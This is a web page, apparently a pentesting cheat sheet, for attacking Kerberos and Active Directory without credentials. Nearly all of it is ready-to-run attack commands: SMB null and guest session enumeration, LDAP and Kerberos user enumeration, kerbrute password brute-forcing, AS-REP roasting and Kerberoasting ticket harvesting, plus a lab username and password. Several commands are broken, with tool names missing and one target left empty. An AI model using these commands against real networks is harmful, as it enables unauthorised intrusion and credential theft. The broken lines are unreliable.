Skip to content

88,464 - Pentesting kerberos

Recon Active Directory (No creds/sessions)

If you just have access to an AD environment but you don't have any credentials/sessions

Pentest the network Scan the network, find machines and open ports and try to exploit vulnerabilities or extract credentials from them (for example, Enumerating DNS could give information about key servers in the domain as web, printers, shares, vpn, media, etc.

gobuster dns -d $DOMAIN -r $IP -t 25 --wildcard -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-110000.txt

Check for null and Guest access on smb services (this won't work on modern Windows versions):

enum4linux -a -u "" -p "" $DCIP
enum4linux -a -u "guest" -p "" $DCIP

smbmap -u "" -p "" -P 445 -H $DCIP
smbmap -u "guest" -p "" -P 445 -H $DCIP
smbclient -U '%' -L //$DCIP
smbclient -U 'guest%' -L //

Enumerate Ldap

nmap -n -sV --script "ldap* and not brute" -p 389 $DCIP

User enumeration


nmap -p 88 --script=krb5-enum-users --script-args="krb5-enum-users.realm='DOMAIN'" $IP
nmap -p 88 --script=krb5-enum-users --script-args krb5-enum-users.realm="$DOMAIN",userdb=/root/Desktop/usernames.txt $IP


crackmapexec smb $DOMAIN -u '' -p '' --users
crackmapexec smb $DOMAIN -u 'guest' -p '' --users

kerbrute - users enumeration

# DOMAIN='spookysec.local'

/opt/windows/kerbrute userenum --dc $DOMAIN -d $DOMAIN $LIST_1

kerbrute - users bruteforce

# DOMAIN='spookysec.local'

/opt/windows/kerbrute bruteuser --dc $DOMAIN -d $DOMAIN $PASS $USER -v

This attack looks for users without Kerberos pre-authentication required attribute.

/opt/tools/impacket/examples/ "$DOMAIN/" -usersfile users.txt -no-pass -dc-ip $IP

Kerberoast - harvest TGS tickets for services

/opt/tools/impacket/examples/ -request -dc-ip $DCIP $DOMAIN/<USERNAME>

With user creds


/opt/windows/ -c ALL -u Tiffany.Molina -p NewIntelligenceCorpUser9876 -d intelligence.htb -dc intelligence.htb -ns